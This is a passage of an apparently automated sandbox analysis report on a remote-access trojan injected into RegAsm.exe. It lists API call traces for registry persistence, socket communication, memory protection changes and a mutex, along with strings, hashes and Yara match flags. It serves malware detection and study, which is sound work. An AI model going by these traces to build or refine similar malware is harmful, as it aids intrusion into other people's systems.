                                                                                                                                        • Opcode Fuzzy Hash: e9faa5e414620fc96257d4712bcffae5cc82c2583e5401c4a4641fe0a8bebe8a
                                                                                                                                        • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                                                                                                        APIs
                                                                                                                                        • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404F81
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404FCD
                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                                                                                                        Strings
                                                                                                                                        • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Create$EventLocalThreadTime
                                                                                                                                        • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                        • API String ID: 2532271599-1507639952
                                                                                                                                        • Opcode ID: 7014718608cfeb48bfe47f339cac9c5a9a17279d6e1db9155cd03e2f3c9ced1b
                                                                                                                                        • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                                                                                                                        • Opcode Fuzzy Hash: 7014718608cfeb48bfe47f339cac9c5a9a17279d6e1db9155cd03e2f3c9ced1b
                                                                                                                                        • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                                                                                                                        APIs
                                                                                                                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                                                                        • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                                                                                                        • RegCloseKey.KERNEL32(?), ref: 004137EC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateValue
                                                                                                                                        • String ID: pth_unenc
                                                                                                                                        • API String ID: 1818849710-4028850238
                                                                                                                                        • Opcode ID: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                                                                                        • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                                                                                                        • Opcode Fuzzy Hash: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                                                                                        • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                                                                                                        APIs
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00404DDB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3360349984-0
                                                                                                                                        • Opcode ID: e2c7dcd9189a3044f1cf6e3ebfe82ec704a9a5fd688f20b61e04b54ec391fab7
                                                                                                                                        • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                                                                                                        • Opcode Fuzzy Hash: e2c7dcd9189a3044f1cf6e3ebfe82ec704a9a5fd688f20b61e04b54ec391fab7
                                                                                                                                        • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                        • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                          • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                          • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModuleProtectVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2905821283-0
                                                                                                                                        • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                        • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                                                                        • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                        • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                                                                                                        • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3177248105-0
                                                                                                                                        • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                                                                        • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                                                                                                        • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                                                                        • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                                                                        • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3177248105-0
                                                                                                                                        • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                        • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                                                                        • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                        • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C568
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CloseCreateHandleReadSize
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3919263394-0
                                                                                                                                        • Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                                                                                        • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                                                                                                        • Opcode Fuzzy Hash: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                                                                                        • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                                                                                                        APIs
                                                                                                                                        • socket.WS2_32(00000002,00000001,00000006), ref: 00404852
                                                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                                                                                                          • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateEventStartupsocket
                                                                                                                                        • String ID: I6
                                                                                                                                        • API String ID: 1953588214-688782887
                                                                                                                                        • Opcode ID: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                                                                                        • Instruction ID: ed99eca956a2b7a9b5891d615cc725ddac26720bb1770143763ad27df005c20f
                                                                                                                                        • Opcode Fuzzy Hash: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                                                                                        • Instruction Fuzzy Hash: 760171B1408B809ED7359F38A8456877FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                                                                                                        APIs
                                                                                                                                        • getaddrinfo.WS2_32(00000000,00000000,00000000, I6,004750E4,00000000,004151C3,00000000,00000001), ref: 00414F46
                                                                                                                                        • WSASetLastError.WS2_32(00000000), ref: 00414F4B
                                                                                                                                          • Part of subcall function 00414DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                                                                                          • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                                                                                          • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                                                                                          • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                                                                                          • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                                                                                          • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                                                                                          • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                                                                                          • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                                                        • String ID: I6
                                                                                                                                        • API String ID: 1170566393-688782887
                                                                                                                                        • Opcode ID: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                                                                                                                        • Instruction ID: 64a5677b7ab27dcaa32d5743096e05a6e92bfc5102e3e8065abb212a99eff034
                                                                                                                                        • Opcode Fuzzy Hash: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                                                                                                                        • Instruction Fuzzy Hash: 23D017322005316BD320A769AC00AEBAA9EDFD6760B12003BBD08D2251DA949C8286E8
                                                                                                                                        APIs
                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                                                                                                        • GetLastError.KERNEL32 ref: 0040D0BE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateErrorLastMutex
                                                                                                                                        • String ID: Rmc-8AXK3L
                                                                                                                                        • API String ID: 1925916568-2005171754
                                                                                                                                        • Opcode ID: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                                                                                                        • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                                                                                                                        • Opcode Fuzzy Hash: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                                                                                                        • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                          • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                          • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                          • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModuleProtectVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2905821283-0
                                                                                                                                        • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                        • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                                                                                        • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                        • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                                                                                        APIs
                                                                                                                                        • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                                                        • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EventObjectSingleWaitsend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3963590051-0
                                                                                                                                        • Opcode ID: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                                                                                                                                        • Instruction ID: ade4869c8039bafc3f5202e75afdfb18787be874a76dce876c460fae4797ad88
                                                                                                                                        • Opcode Fuzzy Hash: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                                                                                                                                        • Instruction Fuzzy Hash: 152124B2900119BBCB04ABA1DC95DEEB77CFF14314B00452FF515B71E2EB38AA15C6A4
                                                                                                                                        APIs
                                                                                                                                        • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                        • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                        • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProtectVirtual$HandleModule
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3519776433-0
                                                                                                                                        • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                        • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                                                                                        • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                        • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                                                        • RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                                                                        • RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3677997916-0
                                                                                                                                        • Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                                                                                        • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                                                                                                                                        • Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                                                                                        • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                                                                                                        • RegQueryValueExA.KERNEL32 ref: 00413768
                                                                                                                                        • RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3677997916-0
                                                                                                                                        • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                                                                                        • Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
                                                                                                                                        • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                                                                                        • Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                                                                        • RegQueryValueExA.KERNEL32 ref: 004135C2
                                                                                                                                        • RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3677997916-0
                                                                                                                                        • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                                                                        • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                                                                                                                        • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                                                                        • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413551
                                                                                                                                        • RegQueryValueExA.KERNEL32 ref: 00413565
                                                                                                                                        • RegCloseKey.KERNEL32(?), ref: 00413570
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3677997916-0
                                                                                                                                        • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                                                                        • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                                                                                                                                        • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                                                                        • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                                                                                                                                        APIs
                                                                                                                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                                                        • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                                                                        • RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                                                                                                                                        Memory Dump Source
